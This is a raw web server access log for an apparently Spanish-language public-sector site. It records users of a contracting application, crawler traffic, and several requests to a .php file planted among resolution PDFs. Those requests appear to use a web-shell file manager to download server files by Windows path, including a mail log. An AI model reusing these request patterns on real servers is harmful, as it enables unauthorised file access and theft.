181.53.12.168 - - [29/Jun/2024:09:51:50 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 200 1505
181.53.12.168 - - [29/Jun/2024:09:51:50 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.12.168 - - [29/Jun/2024:09:51:50 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
181.53.12.168 - - [29/Jun/2024:09:51:50 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
199.16.157.181 - - [29/Jun/2024:09:51:50 -0500] "GET /robots.txt HTTP/1.1" 404 1034
199.16.157.181 - - [29/Jun/2024:09:51:50 -0500] "GET /images/presentaci%C3%B3n%20convenci%C3%B3n.jpg HTTP/1.1" 404 1034
181.53.12.168 - - [29/Jun/2024:09:51:52 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:09:51:52 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2073
181.53.12.168 - - [29/Jun/2024:09:51:53 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 38992
181.53.12.168 - - [29/Jun/2024:09:51:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:09:51:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:09:51:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:09:51:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:09:51:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:09:51:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:09:51:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
66.249.66.12 - - [29/Jun/2024:09:51:56 -0500] "GET /BLA/resoluciones/AUTOS%202024/01121.pdf HTTP/1.1" 304 -
66.249.66.12 - - [29/Jun/2024:09:51:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1298.pdf HTTP/1.1" 200 339892
66.249.66.11 - - [29/Jun/2024:09:51:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1782.pdf HTTP/1.1" 200 354364
201.245.192.253 - - [29/Jun/2024:09:51:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:51:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.53.12.168 - - [29/Jun/2024:09:52:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12798
181.53.12.168 - - [29/Jun/2024:09:52:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 189083
181.53.12.168 - - [29/Jun/2024:09:52:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:09:52:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:09:52:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:09:52:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:09:52:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:09:52:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:09:52:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [29/Jun/2024:09:50:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.53.12.168 - - [29/Jun/2024:09:52:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 398396
186.86.33.204 - - [29/Jun/2024:09:52:21 -0500] "POST /sipse/faces/presentacion/contratacion/procesoContractual/registrarInvitacionContratista.xhtml HTTP/1.1" 200 9243
66.249.66.13 - - [29/Jun/2024:09:52:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3332.pdf HTTP/1.1" 200 485587
186.86.33.204 - - [29/Jun/2024:09:52:30 -0500] "POST /sipse/faces/presentacion/contratacion/procesoContractual/registrarInvitacionContratista.xhtml HTTP/1.1" 200 74333
186.86.33.204 - - [29/Jun/2024:09:52:31 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:37 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 41223
186.86.33.204 - - [29/Jun/2024:09:52:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:43 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/adicionarSupervisor.xhtml HTTP/1.1" 200 16861
186.86.33.204 - - [29/Jun/2024:09:52:48 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:48 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/adicionarSupervisor.xhtml HTTP/1.1" 200 79645
186.86.33.204 - - [29/Jun/2024:09:52:53 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 160564
186.86.33.204 - - [29/Jun/2024:09:52:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:54 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:52:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
66.249.66.11 - - [29/Jun/2024:09:52:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5487.pdf HTTP/1.1" 200 343077
201.245.192.253 - - [29/Jun/2024:09:52:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.86.33.204 - - [29/Jun/2024:09:52:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 35366
186.86.33.204 - - [29/Jun/2024:09:53:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:01 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1400
172.22.2.4 - - [29/Jun/2024:09:51:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53419
186.86.33.204 - - [29/Jun/2024:09:53:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 143027
186.86.33.204 - - [29/Jun/2024:09:53:18 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:18 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:18 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:18 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:18 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 181145
66.249.66.11 - - [29/Jun/2024:09:53:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1989.pdf HTTP/1.1" 200 428142
186.86.33.204 - - [29/Jun/2024:09:53:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 417876
186.86.33.204 - - [29/Jun/2024:09:53:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 73519
186.86.33.204 - - [29/Jun/2024:09:53:54 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:53:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
66.249.66.12 - - [29/Jun/2024:09:53:56 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/Infografia/Parte2/M-150.png HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:09:53:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:53:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.29.68 - - [29/Jun/2024:09:54:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+101-150&f=00000149.tif&ft=download HTTP/1.1" 200 20131
66.249.66.13 - - [29/Jun/2024:09:54:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0456.pdf HTTP/1.1" 200 334583
47.128.50.14 - - [29/Jun/2024:09:54:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2745.pdf&ft=download HTTP/1.1" 200 1986214
172.22.2.4 - - [29/Jun/2024:09:54:46 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
186.86.33.204 - - [29/Jun/2024:09:54:46 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 79238
186.86.33.204 - - [29/Jun/2024:09:54:47 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:54:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:54:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:54:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:54:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:54:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:54:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.111.192 - - [29/Jun/2024:09:54:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150206-1420-958000.txt&ft=download&white=1 HTTP/1.1" 200 2975
172.22.2.4 - - [29/Jun/2024:09:54:47 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:09:54:47 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:09:54:48 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:09:54:48 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:09:54:48 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:09:54:48 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:09:54:48 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:09:54:48 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:09:54:48 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:09:54:48 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
66.249.66.11 - - [29/Jun/2024:09:54:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2380.pdf HTTP/1.1" 200 1779659
201.245.192.253 - - [29/Jun/2024:09:54:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:09:54:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3254.pdf HTTP/1.1" 200 436739
186.86.33.204 - - [29/Jun/2024:09:54:46 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 58357
47.128.113.190 - - [29/Jun/2024:09:55:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes&f=class-phpmailer.php&ft=download HTTP/1.1" 200 110931
201.245.192.253 - - [29/Jun/2024:09:55:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.86.33.204 - - [29/Jun/2024:09:55:12 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 58703
186.86.33.204 - - [29/Jun/2024:09:55:12 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:12 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 30973
186.86.33.204 - - [29/Jun/2024:09:55:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:15 -0500] "POST /sipse/faces/presentacion/contratacion/procesoContractual/registrarInvitacionContratista.xhtml HTTP/1.1" 200 9693
47.128.113.228 - - [29/Jun/2024:09:55:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1970.pdf&ft=download HTTP/1.1" 200 20135
66.249.66.11 - - [29/Jun/2024:09:55:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2897.pdf HTTP/1.1" 200 533594
186.86.33.204 - - [29/Jun/2024:09:55:39 -0500] "POST /sipse/faces/presentacion/contratacion/procesoContractual/registrarInvitacionContratista.xhtml HTTP/1.1" 200 9241
47.128.36.16 - - [29/Jun/2024:09:55:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1840.pdf&ft=download HTTP/1.1" 200 20135
186.29.33.66 - - [29/Jun/2024:09:55:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProyectoActividad/asociarProyectoSolicitud.xhtml HTTP/1.1" 200 65510
186.29.33.66 - - [29/Jun/2024:09:55:41 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:55:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:55:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:55:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:55:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:55:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:55:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:55:42 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:46 -0500] "POST /sipse/faces/presentacion/contratacion/procesoContractual/registrarInvitacionContratista.xhtml HTTP/1.1" 200 74343
186.86.33.204 - - [29/Jun/2024:09:55:46 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:52 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:55:52 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 41223
66.249.66.12 - - [29/Jun/2024:09:55:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3344.pdf HTTP/1.1" 200 761402
201.245.192.253 - - [29/Jun/2024:09:55:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.36.193 - - [29/Jun/2024:09:55:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4222.pdf&ft=download HTTP/1.1" 200 417447
186.86.33.204 - - [29/Jun/2024:09:55:57 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/adicionarSupervisor.xhtml HTTP/1.1" 200 16861
201.245.192.253 - - [29/Jun/2024:09:55:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
